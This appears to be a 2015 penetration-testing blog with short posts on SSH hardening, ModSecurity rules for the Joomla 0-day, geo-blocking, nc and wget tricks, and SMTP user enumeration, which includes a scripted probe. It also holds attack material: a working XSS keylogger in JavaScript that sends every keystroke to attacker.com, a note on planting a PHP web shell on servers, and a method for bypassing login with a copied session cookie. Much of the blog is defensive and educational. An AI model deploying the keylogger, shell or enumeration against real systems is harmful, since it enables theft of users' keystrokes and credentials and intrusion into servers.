Thursday, December 24, 2015

EICAR - How to test antivirus protection of file uploads during security assessments



How to enumerate local users via telnet on open SMTP relays


During a penetration test you sometimes find an SMTP server that relays openly, or at least accepts mail for its local domain.
Such a server can be used to enumerate local user accounts: the reply to RCPT TO differs depending on whether the mailbox exists, so a list of candidate names can be checked one RCPT TO at a time inside a single session.

telnet <smtp-server> <port>

smtp> HELO test
smtp> MAIL FROM: bughunter@x1622.com
smtp> RCPT TO: admin@localhost
smtp> RCPT TO: root@localhost 
smtp> RCPT TO: test@localhost 
smtp> RCPT TO: local@localhost 
...

You will receive different responses depending on whether the user exists (typically 250 or 251) or not (550 "User unknown" or similar). A server that answers 252 to every recipient is deliberately refusing to confirm users, and a catch-all server that accepts everything cannot be enumerated this way. Stop after the RCPT TO probes and send QUIT, never DATA, so no mail is actually delivered. VRFY and EXPN give the same information more directly when they are not disabled.
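The same RCPT TO probe scripted in Python, as an added example that is not code from the original post. To make it runnable offline it starts a small fake SMTP server in-process (constructed for the demo: it knows the mailboxes root and admin and rejects everything else); the host name, the sender address and the candidate user list are assumptions. The probe uses one session, never sends DATA, and maps the reply codes to verdicts, including the 252 reply that some servers return to defeat enumeration.

```python
import smtplib
import socketserver
import threading

# Constructed for this demo: mailboxes the fake server will accept.
KNOWN_USERS = {"root", "admin"}

# Candidate local users to try (assumption; use a real wordlist in practice).
CANDIDATES = ["admin", "root", "test", "local"]


def classify(code):
    """Map the SMTP reply code of RCPT TO to an enumeration verdict."""
    if code in (250, 251):
        return "exists"
    if code == 252:
        # "Cannot VRFY user, but will accept message": the server refuses to tell.
        return "unknown (server does not enumerate)"
    if code in (550, 551, 553):
        return "no such user"
    return "other (%d)" % code


def probe_users(host, port, domain, users, sender="bughunter@example.com"):
    """One session: HELO, MAIL FROM, then RCPT TO per candidate. No DATA is sent."""
    results = {}
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.helo("test")
        code, _ = smtp.mail(sender)
        if code != 250:
            raise RuntimeError("MAIL FROM rejected: %d" % code)
        for user in users:
            code, _ = smtp.rcpt("%s@%s" % (user, domain))
            results[user] = classify(code)
    return results  # the context manager sends QUIT on exit


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Minimal SMTP server: 250 for KNOWN_USERS, 550 for everyone else."""

    def reply(self, text):
        self.wfile.write(text.encode("ascii") + b"\r\n")

    def handle(self):
        self.reply("220 mail.example.com ESMTP")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd = line.decode("ascii", "replace").strip()
            verb = cmd.upper()
            if verb.startswith(("HELO", "EHLO")):
                self.reply("250 mail.example.com")
            elif verb.startswith("MAIL FROM"):
                self.reply("250 2.1.0 Ok")
            elif verb.startswith("RCPT TO"):
                local = cmd.split(":", 1)[1].strip().strip("<>").split("@")[0]
                if local in KNOWN_USERS:
                    self.reply("250 2.1.5 Ok")
                else:
                    self.reply("550 5.1.1 <%s>: Recipient address rejected: User unknown" % local)
            elif verb.startswith("QUIT"):
                self.reply("221 2.0.0 Bye")
                return
            else:
                self.reply("502 5.5.2 Command not implemented")


def start_fake_server():
    """Bind the fake server to a free loopback port and serve it in a daemon thread."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo():
    """Start the fake server, run the probe against it and return the verdicts."""
    server = start_fake_server()
    try:
        host, port = server.server_address
        return probe_users(host, port, "localhost", CANDIDATES)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for user, verdict in demo().items():
        print("%-8s %s" % (user, verdict))
```

Against a real target replace the fake server with the host and port from the telnet session above; everything in probe_users is plain RFC 5321 traffic, so it works unchanged.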

Wednesday, December 23, 2015

create huge file with random content in bash

Penetration tests sometimes need huge files with random content, for example to test upload limits.

tr -dc A-Za-z0-9 </dev/urandom |dd of=/tmp/test.txt bs=1MB count=49 iflag=fullblock

count=<size-in-MB>; bs=1MB is 1,000,000 bytes, use bs=1M for 1,048,576. The tr filter keeps only letters and digits, so the result is printable text; leave tr out to get raw random bytes instead. iflag=fullblock makes dd keep reading until each block is full, otherwise a short read from the pipe produces a smaller file than requested.

Microsoft Virtual Machines with different Internet Explorer Versions

Monday, December 21, 2015

SSH Disabling Password Authentication on Debian

/etc/ssh/sshd_config

set

PermitRootLogin no
PasswordAuthentication no
UsePAM no

Before restarting sshd, confirm from a second session that key-based login already works, and run sshd -t to syntax-check the file. Debian ships with UsePAM yes; if you keep that, also set ChallengeResponseAuthentication no (KbdInteractiveAuthentication in newer OpenSSH), otherwise PAM can still prompt for a password through keyboard-interactive authentication even with PasswordAuthentication no. sshd uses the first value it reads for each keyword, so a duplicate later in the file is ignored, and settings inside a Match block apply only to that match.
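A small checker for the settings above, added here as an example and not part of the original post. It reads an sshd_config the way sshd does (comment lines skipped, first value of a keyword wins, nothing after the first Match line counts as a global default) and reports which of the required values are missing or wrong. The two sample configurations are constructed for the demo; requiring ChallengeResponseAuthentication no in addition to the post's three lines is an assumption explained in the comments.

```python
import re

# Constructed sample configs for this demo (not taken from a real host).
HARDENED = """\
# /etc/ssh/sshd_config (excerpt)
Port 22
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM no
# sshd keeps the first value of a keyword, so this duplicate is ignored
PasswordAuthentication yes
Match User backup
    PasswordAuthentication yes
"""

WEAK = """\
PermitRootLogin yes
#PasswordAuthentication no
UsePAM yes
"""

# Required global values (assumption: the post's baseline plus
# ChallengeResponseAuthentication, without which PAM keyboard-interactive
# can still ask for a password when UsePAM is yes).
REQUIRED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "challengeresponseauthentication": "no",
}

# "Keyword value" or "Keyword=value"; keywords are case-insensitive in sshd.
_DIRECTIVE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9]*)(?:\s*=\s*|\s+)(.*?)\s*$")


def parse_global(config_text):
    """Return {keyword_lower: value} for the global section of an sshd_config.

    Mirrors sshd's reading rules: comment and blank lines are skipped, the first
    value seen for a keyword wins, and everything from the first Match line on
    belongs to a Match block and does not set global defaults.
    """
    settings = {}
    for line in config_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def check(config_text):
    """Return a list of findings; an empty list means REQUIRED is satisfied."""
    settings = parse_global(config_text)
    findings = []
    for key, want in REQUIRED.items():
        got = settings.get(key)
        if got is None:
            findings.append("%s not set, sshd default applies" % key)
        elif got.lower() != want:
            findings.append("%s is %r, want %r" % (key, got, want))
    return findings


if __name__ == "__main__":
    for name, cfg in (("hardened", HARDENED), ("weak", WEAK)):
        print(name, check(cfg) or "OK")
```

On a live host, feed it the output of sshd -T instead of the file: that prints the effective configuration after defaults and Match blocks are applied, which is what actually matters.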

How To Set Up SSH With Public-Key Authentication On Debian

https://www.howtoforge.com/set-up-ssh-with-public-key-authentication-debian-etch

Summary:
server> apt-get install ssh
client> mkdir ~/.ssh
client> chmod 700 ~/.ssh
client> cd ~/.ssh
client> ssh-keygen -t rsa -C "A comment"
client> scp -p id_rsa.pub remoteuser@remotehost:/tmp
server> ssh remoteuser@remotehost
server> mkdir ~/.ssh
server> chmod 700 ~/.ssh
server> cat /tmp/id_rsa.pub >> ~/.ssh/authorized_keys
server> chmod 600 ~/.ssh/authorized_keys
server> mv /tmp/id_rsa.pub ~/.ssh
server> logout
client> rm id_rsa.pub
client> ssh remoteuser@remotehost

ssh-copy-id remoteuser@remotehost does the copy and the permission setup from the client in one step. Keep password login open until a key login in a separate session has succeeded, then disable passwords as described in the post above.


Monday, December 14, 2015

simple rule to block JOOMLA 0-day code execution with MODSECURITY


Based on the information in Sucuri's blog post, this simple ModSecurity rule should block the attack. It matches the class name of the serialized PHP object in the User-Agent header; the same payload can be delivered in other headers that Joomla stores in the session (X-Forwarded-For is the known one), so consider matching REQUEST_HEADERS without a selector instead of REQUEST_HEADERS:User-Agent, and treat the rule as a stopgap until Joomla is patched.

SecRule REQUEST_HEADERS:User-Agent "JDatabaseDriverMysqli" "phase:1,t:none,log,deny,msg:'Joomla 0-day code execution'"
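To see what the rule catches and what it misses, and to find earlier attempts in existing logs, here is an added example (my code, not from the original post or from Sucuri): a parser for Apache "combined" access-log lines that reports every request whose User-Agent carries the JDatabaseDriverMysqli marker, next to a Python equivalent of the User-Agent rule and of the broadened any-header variant. The log lines and the two header sets are constructed for the demo; the payload is reduced to the marker and is not an exploit.

```python
import re

MARKER = "JDatabaseDriverMysqli"  # class name referenced by the serialized payload

# Constructed sample of Apache "combined" access log lines (not from a real server).
# Apache escapes double quotes inside logged header values as \".
SAMPLE_LOG = r'''
203.0.113.10 - - [14/Dec/2015:10:01:02 +0100] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0"
203.0.113.77 - - [14/Dec/2015:10:01:09 +0100] "GET / HTTP/1.1" 403 199 "-" "O:21:\"JDatabaseDriverMysqli\":..."
198.51.100.5 - - [14/Dec/2015:10:02:30 +0100] "POST /administrator/index.php HTTP/1.1" 200 812 "-" "curl/7.38.0"
'''

# combined format: ip ident user [time] "request" status size "referer" "user-agent"
# Quoted fields may contain \" escapes, hence the (?:[^"\\]|\\.)* pattern.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"\s*$'
)


def rule_user_agent(headers):
    """The post's rule: REQUEST_HEADERS:User-Agent matched against MARKER
    (ModSecurity's default operator is a regex; with no metacharacters that is a substring test)."""
    return MARKER in headers.get("User-Agent", "")


def rule_any_header(headers):
    """Broadened variant, REQUEST_HEADERS with no selector: every header value is inspected."""
    return any(MARKER in value for value in headers.values())


def scan_access_log(lines):
    """Return (ip, timestamp, request line) for each combined-format line whose User-Agent carries MARKER."""
    hits = []
    for line in lines:
        m = _COMBINED.match(line)
        if m and MARKER in m.group("ua"):
            hits.append((m.group("ip"), m.group("time"), m.group("request")))
    return hits


# Constructed request header sets (assumption): one delivers the marker in
# User-Agent, the other in X-Forwarded-For.
VIA_UA = {"Host": "www.example.com", "User-Agent": 'O:21:"JDatabaseDriverMysqli":...'}
VIA_XFF = {"Host": "www.example.com", "User-Agent": "Mozilla/5.0",
           "X-Forwarded-For": 'O:21:"JDatabaseDriverMysqli":...'}

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print("hit:", hit)
    print("User-Agent rule:", rule_user_agent(VIA_UA), rule_user_agent(VIA_XFF))
    print("any-header rule:", rule_any_header(VIA_UA), rule_any_header(VIA_XFF))
```

Note that the access log only records the User-Agent, so an attempt that arrived via X-Forwarded-For is invisible to the log scan; that is one more reason to log the full headers of denied requests in ModSecurity's audit log.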


Thursday, December 10, 2015

RFC1918 Address Allocation for Private Internets

Private Address Space

The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets:

10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)

https://tools.ietf.org/html/rfc1918

Sunday, December 6, 2015

Three #DEFCON talks related to malware.


DEFCON 17: Making fun of your malware youtube
DEFCON 17: Malware Freakshow youtube
DEFCON 18: My Life As A Spyware Developer youtube 

Thursday, November 26, 2015

PCI DSS & PCI Penetration Testing Guidance



PCI DSS Penetration Testing Guidance (March 2015)
https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf

PCI Data Security Standard (PCI DSS) v3.1 - Requirements and Security Assessment Procedures
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-1.pdf

Technical Guide to Information Security Testing and Assessment
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf



Wednesday, November 18, 2015

FIDDLER: Decrypt traffic from one hostname only

1) Activate "Decrypt HTTPS traffic" ... from all processes in the Fiddler options.
2) In the Rules menu choose "Customize Rules...".
3) Search for the function "static function OnBeforeRequest(oSession: Session)".
4) Insert the following code (with your host name) inside that function. It flags every CONNECT tunnel except the one to the named host with x-no-decrypt, so Fiddler passes all other TLS sessions through untouched:

  if (oSession.HTTPMethodIs("CONNECT") &&
        !oSession.HostnameIs("www.onlyinterceptthishost.com"))
    {
        oSession["x-no-decrypt"] = "do not care.";
    }

That's all :)

More Details: http://docs.telerik.com/fiddler/Configure-Fiddler/Tasks/DecryptHTTPS


ModSecurity Handbook - very useful


Very useful :)




















=>GOOGLE BOOKS

Tuesday, November 17, 2015

Black/Whitelist Geolocation with ModSecurity

I had the request to whitelist a special GEO location from one of my customers for his web application.

I analyzed current solutions with Cloudflare and others but most of them charge regular fees.

I found this guide on how to set up GEO location checking with ModSecurity and chose this way.
(Additionally I will create a cron job to update the GEO location file once a month)



2) install ModSecurity

3) activate the geo location DB in the ModSecurity configuration file

SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat
SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,pass,nolog"

4) block non-US locations in a custom rule file, for example allow only the USA
SecRule GEO:COUNTRY_CODE3 "!@streq USA" "phase:1,t:none,log,deny,msg:'Client IP not from USA'"

Two things to check before going live: when the lookup fails (private or unlisted addresses) the GEO collection stays empty, the rule has nothing to test and the request passes through, so decide whether that fail-open behaviour is acceptable (a second rule testing &GEO:COUNTRY_CODE3 with @eq 0 can deny such requests); and behind a reverse proxy or CDN REMOTE_ADDR is the proxy's address, so the lookup has to be done on the client IP taken from X-Forwarded-For instead.


That’s all. Cheap and fast :)

Monday, November 16, 2015

Article: simulating low bandwidth with chrome

bash cut & paste command injection

It is not a good idea to copy a bash command straight from an HTML page into a terminal without checking what is behind it.

Example:

Copy "ls -al" from the web page and paste it into the terminal.




















The clipboard can contain additional shell commands that get executed as soon as they are pasted, because a pasted newline runs the line (in this example the first line of /etc/passwd is printed). Hidden text can be placed with CSS or JavaScript, so what you see on the page is not what lands on the clipboard; paste into an editor first, or enable bracketed paste mode in the shell.



The code behind the HTML page looks like:





Sunday, November 15, 2015

french flag in bash

cool :)

t=$(($(tput cols)/3));for FR in $(seq $(tput lines));do printf "\e[44m%${t}s\e[47m%${t}s\e[41m%${t}s\e[0m\n";done # French Flag


posted on twitter by @climagic

Article: Know your enemies

Saturday, November 14, 2015

Bash Script Twitter client for Sysadmins :)



Call ./twitter "#security"



Prerequisite: a Twitter API key. Enter the key file location in script line 16.

Script: http://pastebin.com/THMzVuQC



WGET to clone webpage


Easy way to crawl web pages/applications and store their static content.

wget --keep-session-cookies --save-cookies c.txt --load-cookies c.txt --no-check-certificate -T 10 -x -r -nc <url-to-page>

To set a different user agent add --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"

The cookie file must be in Netscape format: seven fields separated by single tab characters (domain, subdomain flag, path, secure flag, expiry as unix time with 0 for a session cookie, name, value). If the application has a logout link, wget will follow it and end the session; crawl until the logout page has been stored, delete everything else that was fetched, and crawl again with a fresh session. Because of -nc (no-clobber) wget does not download a file it already has, so the stored logout page is skipped on the second run. Drop --no-check-certificate when the target's certificate can be validated.

To bypass the login you can create a cookie file containing an already signed-on session cookie (the fields below are tab-separated in the real file):

# HTTP cookie file.
# Generated by Wget on 2015-11-14 09:18:02.
# Edit at your own risk.

www.page.com FALSE / FALSE 0 name cookie-value
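Since a single space instead of a tab makes wget silently ignore the line, here is an added example (not from the original post) that writes the Netscape cookie file programmatically and parses it back, refusing any line that is not tab-separated. The domain, cookie name PHPSESSID and the session value are constructed for the demo.

```python
import os
import tempfile

HEADER = "# Netscape HTTP Cookie File\n# Edit at your own risk.\n"


def cookie_line(domain, name, value, path="/", secure=False, expires=0):
    """Build one record of a Netscape cookie file.

    Seven fields separated by TAB characters (spaces are not accepted by wget):
    domain, subdomain flag, path, secure flag, expiry (unix time, 0 = session cookie),
    name, value. The subdomain flag is TRUE exactly when the domain starts with a dot.
    """
    fields = [
        domain,
        "TRUE" if domain.startswith(".") else "FALSE",
        path,
        "TRUE" if secure else "FALSE",
        str(int(expires)),
        name,
        value,
    ]
    for field in fields:
        if "\t" in field or "\n" in field:
            raise ValueError("tab or newline in cookie field: %r" % field)
    return "\t".join(fields)


def write_cookie_file(path, cookies):
    """Write the header plus one record per dict in `cookies` (keys as in cookie_line)."""
    with open(path, "w") as fh:
        fh.write(HEADER)
        for cookie in cookies:
            fh.write(cookie_line(**cookie) + "\n")


def parse_cookie_file(text):
    """Parse Netscape cookie text back into dicts; rejects space-separated lines."""
    cookies = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != 7:
            raise ValueError("not a tab-separated Netscape cookie line: %r" % line)
        domain, _flag, path, secure, expires, name, value = parts
        cookies.append({"domain": domain, "name": name, "value": value, "path": path,
                        "secure": secure == "TRUE", "expires": int(expires)})
    return cookies


def demo():
    """Write a session cookie copied from a logged-in browser (constructed value) and read it back."""
    # Assumption: the application keeps its session in a cookie named PHPSESSID.
    cookies = [{"domain": "www.page.com", "name": "PHPSESSID", "value": "0123456789abcdef"}]
    fd, path = tempfile.mkstemp(suffix=".txt")
    os.close(fd)
    try:
        write_cookie_file(path, cookies)
        with open(path) as fh:
            text = fh.read()
    finally:
        os.unlink(path)
    return text, parse_cookie_file(text)


if __name__ == "__main__":
    text, parsed = demo()
    print(text)
    print(parsed)
```

Pass the written file to wget with --load-cookies; a cookie that is only valid for the exact host must use the bare host name as domain, while a leading dot (".page.com") covers all subdomains.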



Friday, November 13, 2015

bash: single line webserver with nc


Setting up a one-line web server in bash for test purposes is easy.

1) put the response page in a file
echo "<html><br>x1622 test webserver</br></html>">/tmp/response.txt

2) get the size of the file (echo appends a newline, so this page is 43 bytes)
ls -al /tmp/response.txt

3) start a simple web server in bash using nc; the Content-Length must equal the file size from step 2, otherwise browsers hang or truncate the page
while true; do { echo -e 'HTTP/1.1 200 OK\r\nContent-Length:43\r\nContent-Type:text/html\r\n'; cat /tmp/response.txt; } | sudo nc -l -p 80 -q 1; done

The -p and -q options are those of the traditional netcat (netcat-traditional on Debian); the OpenBSD netcat takes the port without -p, and older versions of it have no -q.

Other Content-Types:
"text/html", "image/png", "image/gif", "video/mpeg", "text/css", "text/plain"

4) call webpage with browser










5) webserver start & log
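The same test server in Python, as an added example that is not code from the original post: build_response computes the Content-Length from the body so step 2 cannot go wrong, serve answers a fixed number of connections with the canned response and prints a request log line like step 5, and fetch plays the browser of step 4. The body is the page's own test string; port 0 (pick a free port) and the loopback address are assumptions for running it unprivileged.

```python
import socket
import threading
import urllib.request

# The page from the post: 42 bytes without a trailing newline (echo would add one, hence 43).
BODY = "<html><br>x1622 test webserver</br></html>"


def build_response(body, content_type="text/html", status="200 OK"):
    """Build a complete HTTP/1.1 response with Content-Length computed from the body."""
    if isinstance(body, str):
        body = body.encode("utf-8")
    head = "\r\n".join([
        "HTTP/1.1 %s" % status,
        "Content-Length: %d" % len(body),
        "Content-Type: %s" % content_type,
        "Connection: close",
    ]) + "\r\n\r\n"
    return head.encode("ascii") + body


def serve(response, host="127.0.0.1", port=0, requests=1):
    """Answer `requests` connections with the same canned response (the nc loop's
    equivalent) and return the bound port; port 0 picks a free one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    bound_port = srv.getsockname()[1]

    def loop():
        for _ in range(requests):
            conn, peer = srv.accept()
            with conn:
                conn.settimeout(5)
                head = b""
                while b"\r\n\r\n" not in head:  # read the request head only
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    head += chunk
                first = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
                print("%s:%d %s" % (peer[0], peer[1], first))  # the log line of step 5
                conn.sendall(response)
        srv.close()

    threading.Thread(target=loop, daemon=True).start()
    return bound_port


def fetch(port, path="/"):
    """Client side of step 4: return (status, Content-Type, body) from the test server."""
    with urllib.request.urlopen("http://127.0.0.1:%d%s" % (port, path), timeout=5) as resp:
        return resp.status, resp.headers.get("Content-Type"), resp.read()


if __name__ == "__main__":
    port = serve(build_response(BODY), port=8080)
    print("listening on http://127.0.0.1:%d/" % port)
    print(fetch(port))
```

To serve a binary payload such as an image, pass the file's bytes and the matching Content-Type from the list above; the length header is derived from the bytes, not from a directory listing.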










simplest PHP command shell ever :)


The simplest command shell to place on a server during a penetration test, provided the PHP functions that run system commands (system, exec, shell_exec, passthru) are not blocked by disable_functions.

shell:





usage:




Video: Troy Hunt - How I hacked my way to Norway


I really like this video from Troy Hunt.

https://vimeo.com/97530814 

One of World's worst places: Agbogbloshie




http://www.foxnews.com/tech/2014/03/06/welcome-to-hell-photographer-documents-africas-e-waste-nightmare.html

Agbogbloshie is a former wetland and suburb of Accra, Ghana known as a destination for locally generated used electronics from the City of Accra. It has been alleged to be at the center of a legal and illegal exportation network for the environmental dumping of electronic waste (e-waste) from industrialized nations.

https://en.wikipedia.org/wiki/Agbogbloshie

Article: Voice Hero - The Inventor of Karaoke Speaks

Article: Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice

Article: Attacking the Network Time Protocol

Article: Securing Blockchain.info Users with Tor and SSL



Good work; it shows sslstrip in action and why HSTS is needed.
https://www.nikcub.com/posts/securing-blockchain-users-with-tor-and-ssl/

Kevin Mitnick: Live Hack at CeBIT Global Conferences 2015


Simple XSS Key Logger



var keys = '';

// Buffer every keystroke on the page; handles both the old IE event model and DOM events
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
};

// Every second, send the buffer to the attacker as an image request (no CORS needed,
// the response is never read) and clear it. encodeURIComponent keeps characters such
// as & or # from being cut off by the browser.
window.setInterval(function(){
    new Image().src = 'http://attacker.com/keylogger.php?c=' + encodeURIComponent(keys);
    keys = '';
}, 1000);

http://wiremask.eu/xss-keylogger/

Valid SSN for penetration tests

Valid SSN for pentesters  "Numbers from 987-65-4320 - 987-65-4329 are reserved for use in advertisements."

http://stackoverflow.com/questions/2313704/is-there-a-social-security-number-reserved-for-testing-examples

https://en.wikipedia.org/wiki/Social_Security_number

Using X-Frame-Options

Hunting for A+





Good description of how to harden Apache SSL security, FOLLOW LINK

Real '80s Hacker - The Man Who Got No Whammies






"Something was very wrong. Here was this guy from nowhere, and he kept going around the board and hitting the bonus boxes every time. It was bedlam, I can tell you. And we couldn't stop this guy."

~ Michael Brockman, head of the CBS daytime programming department, 1984